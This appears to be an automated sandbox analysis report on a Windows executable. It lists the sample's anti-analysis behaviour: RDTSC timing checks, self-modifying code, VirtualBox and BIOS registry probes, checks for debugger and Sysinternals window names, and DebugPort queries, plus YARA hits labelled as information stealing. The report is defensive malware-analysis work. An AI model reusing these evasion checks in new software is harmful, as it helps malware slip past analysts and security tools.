                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A011F4 second address: 4A0120F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0120F second address: 4A01264 instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 test eax, eax 0x00000009 pushad 0x0000000a push eax 0x0000000b movsx ebx, cx 0x0000000e pop eax 0x0000000f pushfd 0x00000010 jmp 00007F7704DD53B7h 0x00000015 sub ax, BCFEh 0x0000001a jmp 00007F7704DD53B9h 0x0000001f popfd 0x00000020 popad 0x00000021 jne 00007F77751D382Ch 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a movsx edx, si 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01264 second address: 4A01269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01269 second address: 4A012F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, E6h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+08h] 0x0000000b jmp 00007F7704DD53AFh 0x00000010 mov eax, dword ptr [esi] 0x00000012 pushad 0x00000013 call 00007F7704DD53B4h 0x00000018 pushad 0x00000019 popad 0x0000001a pop esi 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F7704DD53B7h 0x00000022 or cx, B9CEh 0x00000027 jmp 00007F7704DD53B9h 0x0000002c popfd 0x0000002d mov ah, 9Fh 0x0000002f popad 0x00000030 popad 0x00000031 mov dword ptr [edx], eax 0x00000033 pushad 0x00000034 mov si, ACEBh 0x00000038 popad 0x00000039 mov eax, dword ptr [esi+04h] 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F7704DD53ADh 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A012F3 second address: 4A01303 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7704E143BCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01303 second address: 4A0134E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+04h], eax 0x0000000b pushad 0x0000000c mov bx, 68C0h 0x00000010 pushfd 0x00000011 jmp 00007F7704DD53B9h 0x00000016 add ecx, 69C220C6h 0x0000001c jmp 00007F7704DD53B1h 0x00000021 popfd 0x00000022 popad 0x00000023 mov eax, dword ptr [esi+08h] 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0134E second address: 4A013A4 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jmp 00007F7704E143C5h 0x0000000c popad 0x0000000d mov dword ptr [edx+08h], eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F7704E143BCh 0x00000017 or ecx, 1ECA93C8h 0x0000001d jmp 00007F7704E143BBh 0x00000022 popfd 0x00000023 popad 0x00000024 mov eax, dword ptr [esi+0Ch] 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F7704E143C0h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A013A4 second address: 4A013BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+0Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A013BC second address: 4A013C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A013C0 second address: 4A013C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A013C4 second address: 4A013CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A013CA second address: 4A01403 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, AEh 0x00000005 push edx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esi+10h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop edx 0x00000012 pushfd 0x00000013 jmp 00007F7704DD53B4h 0x00000018 and ax, AAE8h 0x0000001d jmp 00007F7704DD53ABh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01403 second address: 4A01409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01409 second address: 4A0140D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0140D second address: 4A01476 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+10h], eax 0x0000000e jmp 00007F7704E143C6h 0x00000013 mov eax, dword ptr [esi+14h] 0x00000016 pushad 0x00000017 mov eax, 714A5B8Dh 0x0000001c pushfd 0x0000001d jmp 00007F7704E143BAh 0x00000022 xor ecx, 09D67FA8h 0x00000028 jmp 00007F7704E143BBh 0x0000002d popfd 0x0000002e popad 0x0000002f mov dword ptr [edx+14h], eax 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F7704E143C2h 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0159F second address: 4A0161F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7704DD53AFh 0x00000009 or ax, 589Eh 0x0000000e jmp 00007F7704DD53B9h 0x00000013 popfd 0x00000014 mov ebx, ecx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [edx+24h], eax 0x0000001c jmp 00007F7704DD53AAh 0x00000021 mov eax, dword ptr [esi+28h] 0x00000024 jmp 00007F7704DD53B0h 0x00000029 mov dword ptr [edx+28h], eax 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f pushfd 0x00000030 jmp 00007F7704DD53ACh 0x00000035 jmp 00007F7704DD53B5h 0x0000003a popfd 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0161F second address: 4A0165F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7704E143C0h 0x00000008 sbb ecx, 2277FF58h 0x0000000e jmp 00007F7704E143BBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov esi, 13FE4C0Fh 0x0000001b popad 0x0000001c mov ecx, dword ptr [esi+2Ch] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F7704E143BCh 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0165F second address: 4A01663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01663 second address: 4A01669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01669 second address: 4A0166F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0166F second address: 4A01673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01673 second address: 4A016F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+2Ch], ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 jmp 00007F7704DD53B8h 0x00000018 popad 0x00000019 mov ax, word ptr [esi+30h] 0x0000001d pushad 0x0000001e mov cx, 698Dh 0x00000022 mov si, 1189h 0x00000026 popad 0x00000027 mov word ptr [edx+30h], ax 0x0000002b jmp 00007F7704DD53B4h 0x00000030 mov ax, word ptr [esi+32h] 0x00000034 pushad 0x00000035 push ecx 0x00000036 mov eax, edi 0x00000038 pop edx 0x00000039 mov bl, ah 0x0000003b popad 0x0000003c mov word ptr [edx+32h], ax 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 push ecx 0x00000044 pop edi 0x00000045 mov ax, 7E95h 0x00000049 popad 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A016F2 second address: 4A01704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7704E143BEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01704 second address: 4A01767 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+34h] 0x0000000e pushad 0x0000000f mov al, 0Bh 0x00000011 pushad 0x00000012 mov cx, di 0x00000015 movsx edi, ax 0x00000018 popad 0x00000019 popad 0x0000001a mov dword ptr [edx+34h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F7704DD53B7h 0x00000026 add eax, 677DFB0Eh 0x0000002c jmp 00007F7704DD53B9h 0x00000031 popfd 0x00000032 mov si, 4017h 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01767 second address: 4A01798 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, 00000700h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 call 00007F7704E143C3h 0x00000017 pop esi 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01798 second address: 4A01833 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F77751D330Dh 0x0000000f jmp 00007F7704DD53B0h 0x00000014 or dword ptr [edx+38h], FFFFFFFFh 0x00000018 jmp 00007F7704DD53B0h 0x0000001d or dword ptr [edx+3Ch], FFFFFFFFh 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F7704DD53AEh 0x00000028 and cl, FFFFFFA8h 0x0000002b jmp 00007F7704DD53ABh 0x00000030 popfd 0x00000031 jmp 00007F7704DD53B8h 0x00000036 popad 0x00000037 or dword ptr [edx+40h], FFFFFFFFh 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F7704DD53B7h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F012C second address: 49F0132 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0132 second address: 49F0141 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0141 second address: 49F0147 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0147 second address: 49F014D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F014D second address: 49F0184 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F7704E143BDh 0x00000014 and eax, 7022F6E6h 0x0000001a jmp 00007F7704E143C1h 0x0000001f popfd 0x00000020 mov ch, A5h 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0184 second address: 49F018A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F018A second address: 49F018E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F018E second address: 49F0192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0CC9 second address: 49D0CEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov ch, 06h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0CEC second address: 49D0CF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0CF6 second address: 49D0D60 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7704E143C1h 0x00000008 and cl, FFFFFFA6h 0x0000000b jmp 00007F7704E143C1h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007F7704E143C1h 0x0000001a xchg eax, ebp 0x0000001b jmp 00007F7704E143BEh 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 movzx ecx, bx 0x00000026 mov bh, 59h 0x00000028 popad 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F7704E143C1h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F01FC second address: 49F023C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], ebp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007F7704DD53AAh 0x00000016 xor si, 1C08h 0x0000001b jmp 00007F7704DD53ABh 0x00000020 popfd 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F023C second address: 49F026D instructions: 0x00000000 rdtsc 0x00000002 mov dh, al 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dx, 9738h 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d jmp 00007F7704E143C7h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 movsx edi, cx 0x00000019 mov eax, 41F502F3h 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F026D second address: 49F0273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0273 second address: 49F0277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106F7 second address: 4A1070F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7704DD53B4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1070F second address: 4A10713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10713 second address: 4A10747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F7704DD53ACh 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F7704DD53B0h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d mov di, 523Eh 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10747 second address: 4A107B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 1831h 0x00000007 pushfd 0x00000008 jmp 00007F7704E143BEh 0x0000000d sbb cx, 7C08h 0x00000012 jmp 00007F7704E143BBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov ecx, edi 0x00000021 pushfd 0x00000022 jmp 00007F7704E143C7h 0x00000027 add esi, 11C66CFEh 0x0000002d jmp 00007F7704E143C9h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A107B0 second address: 4A107B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe  Special instruction interceptor: First address: 4739E5 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe  Special instruction interceptor: First address: 473ABD instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe  Special instruction interceptor: First address: 4715EA instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe  Special instruction interceptor: First address: 63D888 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe  Special instruction interceptor: First address: 61BE83 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe  Special instruction interceptor: First address: 6A8E8A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe  Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe  Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe  Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_0061BF57 rdtsc  0_2_0061BF57
                Source: C:\Users\user\Desktop\file.exe  Window / User API: threadDelayed 733
                Source: C:\Users\user\Desktop\file.exe  Window / User API: threadDelayed 798
                Source: C:\Users\user\Desktop\file.exe  Window / User API: threadDelayed 1077
                Source: C:\Users\user\Desktop\file.exe  Window / User API: threadDelayed 1044
                Source: C:\Users\user\Desktop\file.exe  API coverage: 4.1 %
                Source: C:\Users\user\Desktop\file.exe TID: 7564  Thread sleep count: 62 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7564  Thread sleep time: -124062s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 7524  Thread sleep count: 175 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7524  Thread sleep count: 170 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7524  Thread sleep count: 196 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7524  Thread sleep count: 186 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7540  Thread sleep count: 733 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7540  Thread sleep time: -1466733s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 7524  Thread sleep count: 139 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7524  Thread sleep count: 217 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7524  Thread sleep count: 183 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7524  Thread sleep count: 202 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7524  Thread sleep count: 101 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7560  Thread sleep count: 798 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7560  Thread sleep time: -1596798s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 7552  Thread sleep count: 1077 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7552  Thread sleep time: -2155077s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 7544  Thread sleep count: 1044 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7544  Thread sleep time: -2089044s >= -30000s
                Source: all processes  Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: file.exe, file.exe, 00000000.00000002.4108755842.00000000005F6000.00000040.00000001.01000000.00000003.sdmp  Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.4109269730.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4109269730.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.4108755842.00000000005F6000.00000040.00000001.01000000.00000003.sdmp  Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe  System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe  Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe  Process Stats: CPU usage > 42% for more than 60s
                Source: C:\Users\user\Desktop\file.exe  Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe  Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe  Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe  Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe  Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe  Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe  Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe  Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe  Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe  File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe  File opened: SICE
                Source: C:\Users\user\Desktop\file.exe  File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe  Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe  Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe  Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_0061BF57 rdtsc  0_2_0061BF57
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,  0_2_0040CDE3
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,  0_2_00402A50
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_04797D41 push dword ptr fs:[00000030h]  0_2_04797D41
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_04940D90 mov eax, dword ptr fs:[00000030h]  0_2_04940D90
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_0494092B mov eax, dword ptr fs:[00000030h]  0_2_0494092B
                Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_00418592 GetProcessHeap,  0_2_00418592
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409A2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00409A2A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040CDE3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A58A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A58A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A720 SetUnhandledExceptionFilter,0_2_0040A720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04949C91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_04949C91
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0494A7F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0494A7F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0494D04A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0494D04A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0494A987 SetUnhandledExceptionFilter,0_2_0494A987
                Source: file.exe, file.exe, 00000000.00000002.4108755842.00000000005F6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 9,Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A2EC cpuid 0_2_0040A2EC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00410822 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_00410822

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.4940e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.4a30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1670201728.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
MITRE ATT&CK Matrix (one column per tactic; a leading number marks how many signatures mapped to that technique)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
